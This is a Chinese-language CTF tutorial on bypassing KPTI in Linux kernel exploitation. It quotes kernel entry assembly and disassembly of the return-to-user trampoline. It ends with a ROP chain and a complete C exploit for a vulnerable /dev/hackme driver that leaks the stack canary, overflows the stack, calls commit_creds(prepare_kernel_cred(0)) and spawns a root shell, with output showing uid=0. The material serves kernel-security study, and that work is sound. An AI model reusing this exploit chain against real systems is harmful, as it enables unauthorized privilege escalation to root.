KPTI描述内容摘录自ctf wiki
KPTI 机制最初的主要目的是为了缓解 KASLR 的绕过以及 CPU 侧信道攻击。
在 KPTI 机制中,内核态空间的内存和用户态空间的内存的隔离进一步得到了增强。
内核态中的页表包括用户空间内存的页表和内核空间内存的页表。
用户态的页表只包括用户空间内存的页表以及必要的内核空间内存的页表,如用于处理系统调用、中断等信息的内存。
在 x86_64 的 PTI 机制中,内核态的用户空间内存映射部分被全部标记为不可执行。也就是说,之前不具有 SMEP 特性的硬件,如果开启了 KPTI 保护,也具有了类似于 SMEP 的特性。此外,SMAP 模拟也可以以类似的方式引入,只是现在还没有引入。因此,在目前开启了 KPTI 保护的内核中,如果没有开启 SMAP 保护,那么内核仍然可以访问用户态空间的内存,只是不能跳转到用户态空间执行 Shellcode。
Linux 4.15 中引入了 KPTI 机制,并且该机制被反向移植到了 Linux 4.14.11,4.9.75,4.4.110。
内核通过 SWITCH_TO_USER_CR3_STACK 宏实现从内核态页表切换到用户态页表:
/*
 * SWITCH_TO_USER_CR3_STACK: wrapper around SWITCH_TO_USER_CR3_NOSTACK that
 * uses the current stack to free up a second scratch register.
 *
 * %rax is saved with pushq, handed to the inner macro as scratch_reg2, and
 * restored with popq afterwards. \scratch_reg is passed through unchanged and
 * is NOT restored by this macro; the caller must treat it as clobbered.
 */
.macro SWITCH_TO_USER_CR3_STACK scratch_reg:req
pushq %rax
SWITCH_TO_USER_CR3_NOSTACK scratch_reg=\scratch_reg scratch_reg2=%rax
popq %rax
.endm
/*
 * SWITCH_TO_USER_CR3_NOSTACK: load %cr3 into \scratch_reg, OR in
 * PTI_USER_PGTABLE_MASK (and, on the PCID path, PTI_USER_PCID_MASK plus an
 * optional no-flush bit), then write the result back to %cr3.
 *
 * Uses no stack. Clobbers \scratch_reg and the arithmetic flags whenever the
 * switch is performed; \scratch_reg2 is only written on the PCID path, where
 * it holds a copy of the original %cr3 value.
 *
 * NOTE(review): the two ALTERNATIVE lines appear to skip the whole macro when
 * X86_FEATURE_PTI is absent and to skip the PCID handling when
 * X86_FEATURE_PCID is absent. ALTERNATIVE itself is defined outside this
 * excerpt - confirm its semantics there.
 */
.macro SWITCH_TO_USER_CR3_NOSTACK scratch_reg:req scratch_reg2:req
ALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTI
mov %cr3, \scratch_reg
ALTERNATIVE "jmp .Lwrcr3_\@", "", X86_FEATURE_PCID
/*
* Test if the ASID needs a flush.
*/
/* Keep the full CR3 value in \scratch_reg2; \scratch_reg is reduced to the ASID bits. */
movq \scratch_reg, \scratch_reg2
andq $(0x7FF), \scratch_reg /* mask ASID */
bt \scratch_reg, THIS_CPU_user_pcid_flush_mask
jnc .Lnoflush_\@
/* Flush needed, clear the bit */
btr \scratch_reg, THIS_CPU_user_pcid_flush_mask
/* Restore the full CR3 value; the no-flush bit is left unset on this path. */
movq \scratch_reg2, \scratch_reg
jmp .Lwrcr3_pcid_\@
.Lnoflush_\@:
/* Restore the full CR3 value and mark it no-flush via SET_NOFLUSH_BIT. */
movq \scratch_reg2, \scratch_reg
SET_NOFLUSH_BIT \scratch_reg
.Lwrcr3_pcid_\@:
/* Flip the ASID to the user version */
orq $(PTI_USER_PCID_MASK), \scratch_reg
.Lwrcr3_\@:
/* Flip the PGD to the user version */
orq $(PTI_USER_PGTABLE_MASK), \scratch_reg
mov \scratch_reg, %cr3
.Lend_\@:
.endm
引用自arttnba3
众所周知 Linux 采用四级页表结构(PGD->PUD->PMD->PTE),而 CR3 控制寄存器用以存储当前的 PGD 的地址,因此在开启 KPTI 的情况下用户态与内核态之间的切换便涉及到 CR3 的切换,为了提高切换的速度,内核将内核空间的 PGD 与用户空间的 PGD 两张页全局目录表放在一段连续的内存中(两张表,一张一页4k,总计8k,内核空间的在低地址,用户空间的在高地址),这样只需要改变 CR3 的第 13 位(从 0 开始计数为 bit 12,即上面宏中的 PTI_USER_PGTABLE_MASK)便能完成页表切换的操作:切换到用户态页表时将该位置 1(对应上面宏中的 orq),切换回内核态页表时将该位清 0
该宏在系统调用、中断处理的返回路径上使用(都需要从内核态切换回用户态),如下是经过删减的系统调用入口 entry_SYSCALL_64 的代码:
/*
 * Abridged excerpt of the 64-bit syscall entry/exit path ("[...]" marks
 * omitted code). Shown here: the checks that divert to
 * swapgs_restore_regs_and_return_to_usermode, and the fast exit that
 * switches CR3 and returns through USERGS_SYSRET64.
 */
SYM_CODE_START(entry_SYSCALL_64)
UNWIND_HINT_EMPTY
swapgs
[...]
cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */
jne swapgs_restore_regs_and_return_to_usermode // note this jump <<<<<<<<<<<<<<<<<<<
movq R11(%rsp), %r11
cmpq %r11, EFLAGS(%rsp) /* R11 == RFLAGS */
jne swapgs_restore_regs_and_return_to_usermode // note this jump <<<<<<<<<<<<<<<<<<<
/* nothing to check for RSP */
cmpq $__USER_DS, SS(%rsp) /* SS must match SYSRET */
jne swapgs_restore_regs_and_return_to_usermode // note this jump <<<<<<<<<<<<<<<<<<<
[...]
SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< this macro switches from the kernel page tables to the user page tables
popq %rdi
popq %rsp
USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
从代码可知,在系统调用结束、返回到用户态之前,会先展开 SWITCH_TO_USER_CR3_STACK 宏切换页表,
之后再执行如下指令返回到用户态:
popq %rdi
popq %rsp
USERGS_SYSRET64
#define USERGS_SYSRET64 \
swapgs; \
sysretq;
由于 SWITCH_TO_USER_CR3_STACK 是宏,在 /proc/kallsyms 中不存在其符号地址,因此一般是先获取使用到该宏的函数的地址,再加上 SWITCH_TO_USER_CR3_STACK 展开处的偏移,作为 rop 链中的地址进行利用。
例如:先从 /proc/kallsyms 中获取 entry_SYSCALL_64 的地址,再通过反汇编工具找到 entry_SYSCALL_64 中 SWITCH_TO_USER_CR3_STACK 展开开始处的地址,将该地址作为 rop 链的一环。
利用 entry_SYSCALL_64 内部的 SWITCH_TO_USER_CR3_STACK 时,执行完页表切换后会接着自动执行到 swapgs; sysretq,因此需要在 rop 链中构造 sysretq 切换到用户态时需要的内核栈。
再看看entry_SYSCALL_64
的代码
/*
 * Same abridged excerpt of the syscall path, annotated with markers:
 * [1] = checks that divert to swapgs_restore_regs_and_return_to_usermode,
 * [2] = CR3 switch on the exit that returns through USERGS_SYSRET64.
 */
SYM_CODE_START(entry_SYSCALL_64)
UNWIND_HINT_EMPTY
swapgs
[...]
cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */
[1] jne swapgs_restore_regs_and_return_to_usermode // note this jump <<<<<<<<<<<<<<<<<<<
movq R11(%rsp), %r11
cmpq %r11, EFLAGS(%rsp) /* R11 == RFLAGS */
[1] jne swapgs_restore_regs_and_return_to_usermode // note this jump <<<<<<<<<<<<<<<<<<<
/* nothing to check for RSP */
cmpq $__USER_DS, SS(%rsp) /* SS must match SYSRET */
[1] jne swapgs_restore_regs_and_return_to_usermode // note this jump <<<<<<<<<<<<<<<<<<<
[...]
[2] SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< this macro switches from the kernel page tables to the user page tables
popq %rdi
popq %rsp
USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
如果系统调用不出什么意外,是通过 [2] 处的代码从内核态页表切换到用户态页表。
当 [1] 处的任一检查不通过时,则跳转到 swapgs_restore_regs_and_return_to_usermode
返回到用户态:其中同样包含了页表切换、swapgs 和 iretq
/*
 * swapgs_restore_regs_and_return_to_usermode: return-to-user path.
 *
 * As excerpted here it: restores the general registers except RDI
 * (POP_REGS pop_rdi=0), switches %rsp to the stack loaded from
 * cpu_tss_rw + TSS_sp0, copies the IRET frame and user RDI onto it,
 * switches CR3 to the user page tables, restores RDI, and leaves through
 * SWAPGS + INTERRUPT_RETURN.
 *
 * Note that orig_ax (1*8(%rdi)) is the one slot of the old stack that is not
 * copied to the new stack.
 */
SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
#ifdef CONFIG_DEBUG_ENTRY
/* Assert that pt_regs indicates user mode. */
testb $3, CS(%rsp)
jnz 1f
ud2
1:
#endif
POP_REGS pop_rdi=0
/*
* The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
* Save old stack pointer and switch to trampoline stack.
*/
movq %rsp, %rdi
movq PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
UNWIND_HINT_EMPTY
/* Copy the IRET frame to the trampoline stack. */
pushq 6*8(%rdi) /* SS */
pushq 5*8(%rdi) /* RSP */
pushq 4*8(%rdi) /* EFLAGS */
pushq 3*8(%rdi) /* CS */
pushq 2*8(%rdi) /* RIP */
/* Push user RDI on the trampoline stack. */
pushq (%rdi)
/*
* We are on the trampoline stack. All regs except RDI are live.
* We can do future final exit work right here.
*/
STACKLEAK_ERASE_NOCLOBBER
SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< this macro switches from the kernel page tables to the user page tables
/* Restore RDI. */
popq %rdi
SWAPGS
INTERRUPT_RETURN // <<<<<<<<<<<<<<<<<<<< iretq
#define INTERRUPT_RETURN iretq
大佬们说,通过反汇编才能看到细节
先找到swapgs_restore_regs_and_return_to_usermode的地址
/ # cat /proc/kallsyms | grep "swapgs_restore_regs_and_return_to_usermode"
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
.text:FFFFFFFF81200F10
.text:FFFFFFFF81200F10 pop r15 【1】<< swapgs_restore_regs_and_return_to_usermode起始位置
.text:FFFFFFFF81200F12 pop r14
.text:FFFFFFFF81200F14 pop r13
.text:FFFFFFFF81200F16 pop r12
.text:FFFFFFFF81200F18 pop rbp
.text:FFFFFFFF81200F19 pop rbx
.text:FFFFFFFF81200F1A pop r11
.text:FFFFFFFF81200F1C pop r10
.text:FFFFFFFF81200F1E pop r9
.text:FFFFFFFF81200F20 pop r8
.text:FFFFFFFF81200F22 pop rax
.text:FFFFFFFF81200F23 pop rcx
.text:FFFFFFFF81200F24 pop rdx
.text:FFFFFFFF81200F25 pop rsi
.text:FFFFFFFF81200F26 mov rdi, rsp 【2】<< 由于pop较多,会增加rop的长度,一般从这里利用,距离起始位置22
.text:FFFFFFFF81200F29 mov rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32 push qword ptr [rdi+30h]
.text:FFFFFFFF81200F35 push qword ptr [rdi+28h]
.text:FFFFFFFF81200F38 push qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B push qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E push qword ptr [rdi+10h]
.text:FFFFFFFF81200F41 push qword ptr [rdi]
.text:FFFFFFFF81200F43 push rax
.text:FFFFFFFF81200F44 jmp short loc_FFFFFFFF81200F89 【3】
[...]
[...]
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89 pop rax 【3】弹出 F43 处压入的 rax,下一条再弹出从 [rdi] 拷贝来的用户 rdi;因此 rop 链中在跳板地址之后需要两个填充项:[rdi](被当作用户 rdi)和未被拷贝的 [rdi+8](orig_ax)
.text:FFFFFFFF81200F8A pop rdi
.text:FFFFFFFF81200F8B call cs:off_FFFFFFFF82040088 【4】swapgs
.text:FFFFFFFF81200F91 jmp cs:off_FFFFFFFF82040080 【5】iretq
pop rdi; ret;
0
prepare_kernel_cred
mov rdi, rax; ret;
commit_creds
swapgs_restore_regs_and_return_to_usermode + 22
0
0
user_rip
user_cs
user_rflags
user_sp
user_ss
由于通过 iretq 返回到用户态时需要构造的内核栈布局比 sysretq 简单,一般是使用 swapgs_restore_regs_and_return_to_usermode 来绕过 KPTI
启用 KPTI
#!/bin/sh
# Boot the challenge kernel under QEMU with SMEP and SMAP exposed to the guest
# (-cpu kvm64,+smep,+smap) and KASLR disabled (nokaslr on the kernel command line).
# NOTE(review): the kernel command line carries no explicit PTI switch, so KPTI
# being active relies on the kernel's default for this CPU model - confirm, or
# add pti=on to -append to force it.
qemu-system-x86_64 \
-m 1024M \
-cpu kvm64,+smep,+smap \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "console=ttyS0 nokaslr quiet panic=1"
先执行之前只绕过 SMEP 的 exp,结果出现段错误(该 exp 的 rop 链在返回用户态之前没有切换回用户态页表):
/ $ ./04_exploit_bypass_smep
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x7ae17b2ee0e55b00 @ index 16
[*] saving user land state
[*] trying to overwrite return address with ROP chain
Segmentation fault
/ $
将exp中的rop修改为如下内容
/* ROP chain written from the canary slot onwards (one 8-byte word per entry). */
payload[cookie_off++] = cookie;
/* NOTE(review): three filler words between the canary and the return address;
 * the count is specific to the vulnerable function's stack frame - confirm. */
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = pop_rdi_ret; // return address
payload[cookie_off++] = 0x0; // value popped into rdi: prepare_kernel_cred(0)
payload[cookie_off++] = prepare_kernel_cred;
payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1_ret;
payload[cookie_off++] = 0x0; // presumably filler for the extra pop the gadget name ("pop1") implies
payload[cookie_off++] = commit_creds;
payload[cookie_off++] = swapgs_restore_regs_and_return_to_usermode + 22; // the label starts with a run of pop instructions we do not need; enter at the offset right after them
payload[cookie_off++] = 0x0; // slot the trampoline copies and later pops as user RDI
payload[cookie_off++] = 0x0; // orig_ax slot, not copied by the trampoline
/* IRET frame: RIP, CS, EFLAGS, RSP, SS. */
payload[cookie_off++] = user_rip;
payload[cookie_off++] = user_cs;
payload[cookie_off++] = user_rflags;
payload[cookie_off++] = user_sp;
payload[cookie_off++] = user_ss;
结果如下
/ $ ./05_exploit_bypass_kpti_with_trampoline
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x25ed2c3e73fecd00 @ index 16
[*] saving user land state
[*] trying to run ROP chain and bypass KPTI with trampoline
[+] returned to user land
[+] got root (uid = 0)
[*] spawning shell
/ # id
uid=0 gid=0
完整exp
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
/* Path of the vulnerable character device opened by open_dev(). */
char *VULN_DRV = "/dev/hackme";
/* Forward declaration: user_rip below takes this function's address. */
void spawn_shell();
/* File descriptor of VULN_DRV; set by open_dev(), used for read()/write(). */
int64_t global_fd = 0;
/* Stack canary value recovered by leak_cookie(). */
uint64_t cookie = 0;
/* Index, in 8-byte words, of the canary in the leaked data; the payload is
 * also built starting from this index. */
uint8_t cookie_off = 16;
/* User-mode register state captured by save_userland_state() and placed in
 * the IRET frame of the payload. */
uint64_t user_cs, user_ss, user_rflags, user_sp;
/* User-mode instruction pointer placed in the IRET frame. */
uint64_t user_rip = (uint64_t) spawn_shell;
/* Hard-coded kernel addresses. They are only valid for this exact kernel
 * image booted with nokaslr; the last one matches the /proc/kallsyms entry
 * for swapgs_restore_regs_and_return_to_usermode. */
uint64_t prepare_kernel_cred = 0xffffffff814c67f0;
uint64_t commit_creds = 0xffffffff814c6410;
uint64_t pop_rdi_ret = 0xffffffff815f88ec;
uint64_t mov_rdi_rax_clobber_rsi140_pop1_ret = 0xffffffff816bf203;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81200f10;
/*
 * Open the vulnerable device read/write and store the descriptor in
 * global_fd. Prints a status line either way and terminates the process
 * with exit(-1) when the device cannot be opened.
 */
void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);

    /* Success is the common case: report it and return early. */
    if (global_fd >= 0) {
        printf("[+] successfully opened %s\n", VULN_DRV);
        return;
    }

    printf("[!] failed to open %s\n", VULN_DRV);
    exit(-1);
}
/*
 * Read 40 8-byte words from the device and take the word at index cookie_off
 * as the stack canary, storing it in the global `cookie`.
 *
 * The buffer is zero-initialised and the read() result is checked, so a
 * failed or short read can never make us pick up indeterminate stack data:
 * a failed read aborts immediately, and a short read leaves the canary slot
 * at 0, which the final check rejects.
 *
 * Terminates the process with exit(-1) on any failure.
 */
void leak_cookie() {
    uint64_t leak[40] = {0};

    /* sizeof yields size_t, so %zu is the matching conversion. */
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));

    ssize_t got = read(global_fd, leak, sizeof(leak));
    if (got < 0) {
        puts("[-] read() on the device failed");
        exit(-1);
    }

    /* Guard the index: cookie_off is a global and must stay inside leak[]. */
    if (cookie_off >= sizeof(leak) / sizeof(leak[0])) {
        puts("[-] failed to leak stack canary!");
        exit(-1);
    }

    cookie = leak[cookie_off];
    printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);
    if (!cookie) {
        puts("[-] failed to leak stack canary!");
        exit(-1);
    }
}
/*
 * Landing point in user mode (its address is stored in user_rip).
 * Verifies that the process now runs as uid 0, then spawns /bin/sh.
 * Never returns: exits with -1 when not root, with 0 after the shell ends.
 */
void spawn_shell() {
    puts("[+] returned to user land");

    uid_t current_uid = getuid();
    if (current_uid != 0) {
        printf("[!] failed to get root (uid: %d)\n", current_uid);
        exit(-1);
    }
    printf("[+] got root (uid = %d)\n", current_uid);

    puts("[*] spawning shell");
    system("/bin/sh");
    exit(0);
}
/*
 * Record the current user-mode cs, ss, rsp and rflags in the user_cs,
 * user_ss, user_sp and user_rflags globals so they can later be placed in
 * the IRET frame of the payload.
 */
void save_userland_state() {
puts("[*] saving user land state");
/*
 * Basic asm written in Intel syntax. It stores to the globals directly by
 * symbol name; rflags is obtained by pushing it and popping it into
 * user_rflags. The final directive switches the assembler back to AT&T
 * syntax for the compiler-generated code that follows.
 * NOTE(review): no outputs or clobbers are declared, so the compiler is not
 * told that these globals are written here.
 */
__asm__(".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax");
}
/*
 * Build the overflow payload and write it to the device.
 *
 * Layout (8-byte words): the words below index cookie_off are zero filler,
 * then the canary, frame filler, the ROP chain, and finally the IRET frame
 * consumed by swapgs_restore_regs_and_return_to_usermode.
 *
 * Differences from a naive version:
 *  - the payload is zero-initialised, so no indeterminate stack bytes are
 *    sent to the device;
 *  - the chain is placed using a local index, so the global cookie_off is
 *    left untouched;
 *  - the chain is bounds-checked against the payload size;
 *  - a failing write() is reported.
 *
 * If write() returns at all, control flow was not hijacked and the attempt
 * failed; the function then prints a failure notice and returns.
 */
void overwrite_ret() {
    enum { PAYLOAD_QWORDS = 35 };

    puts("[*] trying to run ROP chain and bypass KPTI with trampoline");

    uint64_t payload[PAYLOAD_QWORDS] = {0};

    const uint64_t chain[] = {
        cookie,
        0x0, /* frame filler between canary and return address */
        0x0,
        0x0,
        pop_rdi_ret, /* return address */
        0x0, /* rdi = 0 for prepare_kernel_cred */
        prepare_kernel_cred,
        mov_rdi_rax_clobber_rsi140_pop1_ret,
        0x0, /* filler for the gadget's extra pop */
        commit_creds,
        /* Skip the run of pop instructions at the start of the label and
         * enter right after them. */
        swapgs_restore_regs_and_return_to_usermode + 22,
        0x0, /* slot copied and later popped as user RDI */
        0x0, /* orig_ax slot, not copied by the trampoline */
        user_rip, /* IRET frame: RIP, CS, EFLAGS, RSP, SS */
        user_cs,
        user_rflags,
        user_sp,
        user_ss,
    };
    const size_t chain_len = sizeof(chain) / sizeof(chain[0]);

    /* Refuse to run past the end of payload[] if cookie_off is ever changed. */
    if ((size_t)cookie_off + chain_len > PAYLOAD_QWORDS) {
        puts("[!] ROP chain does not fit into the payload buffer");
        exit(-1);
    }

    for (size_t i = 0; i < chain_len; i++) {
        payload[(size_t)cookie_off + i] = chain[i];
    }

    if (write(global_fd, payload, sizeof(payload)) < 0) {
        puts("[!] write() to the device failed");
    }
    puts("[-] if you can read this we failed the mission :(");
}
/*
 * Entry point: open the device, leak the canary, record the user-mode
 * register state, then send the payload. Command-line arguments are unused.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    open_dev();            /* sets global_fd */
    leak_cookie();         /* sets cookie */
    save_userland_state(); /* sets user_cs / user_ss / user_sp / user_rflags */
    overwrite_ret();       /* only returns if the attempt failed */

    return 0;
}
https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development/kernel-page-table-isolation-kpti
https://github.com/torvalds/linux/blob/7587a4a5a4f66293e13358285bcbc90cc9bddb31/arch/x86/entry/entry_64.S#L575
https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/kpti/#switch_to_user_cr3_stack
https://github.com/pr0cf5/kernel-exploit-practice/tree/master/bypass-smep#bypassing-smepkpti-via-rop
https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#version-1-trampoline-goes-weeeh